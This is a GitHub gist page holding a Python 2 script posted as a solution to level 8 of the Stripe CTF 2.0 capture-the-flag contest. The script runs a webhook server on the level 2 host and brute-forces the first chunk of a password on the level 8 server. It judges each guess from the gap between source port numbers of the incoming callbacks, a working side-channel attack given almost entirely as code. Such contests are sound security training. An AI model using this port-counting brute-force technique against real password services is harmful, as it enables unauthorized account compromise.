Created
August 26, 2012 21:53
-
-
Save bradly/3483807 to your computer and use it in GitHub Desktop.
Stripe CTF 2.0, level8, py2k webhook for getting the 1st chunk
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from os import curdir, sep | |
| import httplib | |
| from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer | |
| workvar = 0 | |
| # arrvar holds the remaining possible solutions to this block | |
| arrvar = range(999) | |
| globport = 0 | |
| # config vars: | |
| serva8 = "level08-3.stripe-ctf.com" #level8 server | |
| serva2 = "level02-3.stripe-ctf.com" #level2 server | |
| webhookport = 35215 | |
| username = "user-jzshmsocwx" # username on level8 | |
| # handle incoming HTTP requests | |
| class MyHandler(BaseHTTPRequestHandler): | |
| def do_POST(self): | |
| global workvar, globport, arrvar | |
| varLen = int(self.headers['Content-Length']) | |
| postVars = self.rfile.read(varLen) | |
| self.send_response(200) | |
| self.send_header('Content-type', 'text/plain') | |
| self.end_headers() | |
| self.wfile.write("POST OK\n"); | |
| self.wfile.write("Data: "+str(postVars)); | |
| # print port | |
| print "[" + str(workvar).zfill(3) + "[000][000][000]", | |
| print "port: " + str(self.client_address[1]) + "; ", | |
| print "diff: " + str(self.client_address[1] - globport), | |
| if self.client_address[1] - globport == 2: | |
| arrvar.remove(arrvar[workvar]) | |
| print "INCORRECT! (remaining to test: "+str(len(arrvar))+")" | |
| elif len(arrvar) == 1: | |
| print "CHUNK SOLUTION: " + str(arrvar[0]) + "\n" | |
| else: | |
| print "POTENTIAL! (remaining to test: "+str(len(arrvar))+")" | |
| globport = self.client_address[1] | |
| newConnection() | |
| return | |
| # except : | |
| pass | |
| def newConnection(): | |
| global workvar, username, serva2, webhookport | |
| workvar = workvar + 1 | |
| if workvar > len(arrvar) - 1: | |
| workvar = 0 | |
| conn = httplib.HTTPSConnection(serva8, 443) | |
| testn = str(arrvar[workvar]).zfill(3) + "000000000" | |
| print "Testing : " + testn | |
| conn.request("POST", "/"+username+"/", '{"password": "' + testn + '", "webhooks": ["'+serva2+':'+str(webhookport)+'"] }') | |
| conn.close() | |
| def main(): | |
| try: | |
| server = HTTPServer(('', webhookport), MyHandler) | |
| print 'started httpserver...' | |
| server.serve_forever() | |
| except KeyboardInterrupt: | |
| print '^C received, shutting down server' | |
| server.socket.close() | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment